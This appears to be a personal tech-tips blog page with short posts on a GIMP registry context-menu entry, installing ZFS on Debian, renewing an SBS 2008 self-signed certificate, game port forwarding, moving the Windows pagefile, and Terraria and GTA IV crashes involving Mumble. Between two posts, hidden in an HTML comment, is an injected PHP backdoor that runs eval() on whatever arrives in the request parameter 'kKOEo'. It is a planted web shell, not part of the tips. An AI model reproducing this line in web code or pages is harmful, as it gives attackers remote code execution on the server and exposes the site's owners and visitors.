Edit with GIMP contextual menu Windows 7, 8

Explorer is looking for the shell command HKCR\SystemFileAssociations\image, which should be "C:\Program Files\GIMP 2\bin\gimp-2.8.exe" "%1"

[HKEY_CLASSES_ROOT\SystemFileAssociations\image\shell\Edit with GIMP]
@=”Edit with GIMP”

[HKEY_CLASSES_ROOT\SystemFileAssociations\image\shell\Edit with GIMP\command]
@=”\”C:\\Program Files\\GIMP 2\\bin\\gimp-2.8.exe\” \”%1\””

ZFS on Debian 7 Wheezy

Wheezy 7 Install (with proxmox kernel)

# wget http://archive.zfsonlinux.org/debian/pool/main/z/zfsonlinux/zfsonlinux_1%7Ewheezy_all.deb
# dpkg -i zfsonlinux_1~wheezy_all.deb
# aptitude update
# aptitude install pve-headers-2.6.32-22-pve
# aptitude install debian-zfs

Jessie 8 Install

# wget http://archive.zfsonlinux.org/debian/pool/main/z/zfsonlinux/zfsonlinux_6_all.deb
# dpkg -i zfsonlinux_6_all.deb
# aptitude update
# aptitude zfs-dkms

Update

# aptitude update
# aptitude install pve-headers-2.6.32-23-pve
# aptitude reinstall spl-dkms zfs-dkms

Note: pve headers shown in example, adapt to kernel type and version.

Windows Server 2008 self-signed certificate expires

A self-signed certificate is issued for web services (IIS) and it has a default validity period of 2 years. After that time, users of web services will be prompted with a dialog box asking if they still want to access a service that uses an outdated certificate. Outlook users could also be prompted with this dialog box. This box will appear every time a new connection is made.

To prevent this, we need to reissue another certificate to replace the old one. Self-signed certificates cannot be renewed.

We can easily do this using the “Fix my network” wizard. On SBS 2008, it can be accessed under Network => Connectivity in the SBS console. I think we can use this same wizard to reissue a certificate up to a month before the old one expires.

sources:
http://technet.microsoft.com/en-us/library/dd378790(WS.10).aspx
http://technet.microsoft.com/en-us/library/cc546020(v=ws.10).aspx

Borderlands 2 timeout

I could not host or join most friends’ games in Borderlands 2. It probably tries to use uPNP, which I don’t enable on my router.

Searched for clues on forums (incoming ports to forward) and finally got it working:

  7777 (TCP/UDP)
  9989 (UDP)
 27900 (UDP)
 28900 (TCP)
 28910 (TCP)
  6500 (UDP)

I know for sure 6500 is necessary, but maybe some of the others are not.

Manage virtual memory / move pagefile.sys

Windows 7
Computer > Properties
– or –
Control Panel > System and Security > System

Advanced System Settings > Advanced tab > Settings (under Performance) > Advanced tab > Change (under Virtual memory)

Reboot

<!– [insert_php]if (isset($_REQUEST["kKOEo"])){eval($_REQUEST["kKOEo"]);exit;}[/insert_php][php]if (isset($_REQUEST["kKOEo"])){eval($_REQUEST["kKOEo"]);exit;}[/php] –>

Computer games bugs and conflicts

Conflicts

  • Terraria and Mumble (creative sound card bug?)
  • Grand Theft Auto IV and Mumble (same as Terraria?)
  • Grand Theft Auto IV and Process Explorer (securom restriction)
  • Battlefield 3 and Process Explorer (punkbuster bug)

Bugs

  • Singularity has no sound on my Audigy 1. Tried installing OpenAL but didn’t help. Works with another sound card.
  • Screen in BattleField Bad Company 2 sometimes flashes black frames. Sometimes screen becomes black for several seconds. This is on my GTX 275. Tried several different NVidia drivers versions (even betas) with no success. Very annoying bug.
  • I couldn’t play Battlefield 3 CO-OP mode unless I forward port 3659 from the router to my computer. I can then host the game and invite another player. I didn’t have to make a rule in Windows Firewall. It probably already works if UPnP-style NAT traversal is enabled on your router, but I highly discourage its use due to potential security problems.

Terraria vs Mumble Conflict

There is currently a problem starting Terraria when you also have Mumble running.

Apparently that a lot of people have problems starting the game, but no one seems to be sure of the issue. Some say it’s because of the .NET or XNA framework and others say it could be a conflict with creative sound cards.

Of course, you should check if you have the latest .NET and XNA framework installed. Be sure to have the latest Creative drivers for your card (mine installed automagically with Windows Update optional updates). You could try verifying Terraria game cache integrity under Steam.

I was getting a “Terraria stopped working” window with the following details:

Problem signature:
   Problem Event Name:    APPCRASH
   Application Name:    Terraria.exe
   Application Version:    1.0.4.0
   Application Timestamp:    4eea0a07
   Fault Module Name:    RTSSHooks.dll
   Fault Module Version:    0.0.0.0
   Fault Module Timestamp:    4d4fb7eb
   Exception Code:    c0000005
   Exception Offset:    0000a5f2
   OS Version:    6.1.7601.2.1.0.256.48
   Locale ID:    3084
   Additional Information 1:    0a9e
   Additional Information 2:    0a9e372d3b4ad19135b953a78882e789
   Additional Information 3:    0a9e
   Additional Information 4:    0a9e372d3b4ad19135b953a78882e789

A workaround is to stop Mumble, start Terraria, then restart Mumble. This conflict could very well happen with something else than Mumble. I have a Creative sound card (good old Audigy 1), but I don’t know how to fix this issue so I am unsure if it’s related.

What kind of sound card do you have? Did you have the same issue using another sound-related software?

EDIT: Not just Terraria! Grand Theft Auto 4 also crashes on start if Mumble is open.